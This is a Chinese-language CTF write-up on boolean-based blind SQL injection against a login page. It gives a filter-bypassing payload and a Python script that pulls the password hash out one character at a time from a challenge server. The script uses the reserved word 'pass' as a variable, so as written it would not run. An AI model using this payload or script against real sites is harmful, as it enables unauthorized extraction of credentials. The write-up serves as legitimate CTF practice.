ctf-web-sql注入

题目链接：跳转提示

打开网页，一个登陆页面，根据题是本题题型是基于布尔的SQL盲注

首先在用户名处输入admin

得到结果：

即密码确为admin，而如果不输入用户名直接输入密码，发现报错

可见后台是先判断用户名是否正确存在，当用户名正确后再判断密码是否正确。

经测试发现，当出现'空格符'，'='，'and'等字符时，发现会报错显示：‘illegal character’，即知道这些字符会被过滤，可以用括号来避免空格符的使用，用<>（大于或小于）来避免'='的使用

尝试输入：ad'or(ascii(substr((password)from(1)))<>97)#

只有当ascii(substr((password)from(1)))==97时，整个句式username=='ad'or(ascii(substr((password)from(1)))<>97)为假，

即预计只有当显示结果为username does not exist!时，ascii(substr((password)from(1)))<>97为假，可以用此方法判断password的内容

得到结果：

 发现句式可用，因为ad不是用户名，结果却显示密码错误，没有显示用户名错误，根据or的特性，说明后半段的语句为真，即password的第一个字符<>97

利用脚本：

import requests
ra=requests.session()
pass=""
for j in range(1,100):
    flag=0
    for i in range(48,123):
        test="admin1'or(ascii(substr((password)from("+str(j)+")))<>"+str(i)+")#"
        url='http://114.67.175.224:18554/'
        data={
            'username':test,
            'password':""
        }
        pa=ra.post(url=url,data=data).text
        if "username does not exist!" in pa:
            pass+=chr(i)
            flag=i
            break
    if flag==123:
        break
print(pass)

 

得到password=4dcc88f8f1bc05e7c2ad1a60288481a2

发现密码错误，因为这串字符符合md5摘要格式（32个字符，只包含0~9，a~f字符）

md5解码果然得到：bugkuctf

输入用户名：admin     密码：bugkuctf 得到flag

（PS：这道题还没开始注入就把密码试出来了，这密码太简单了）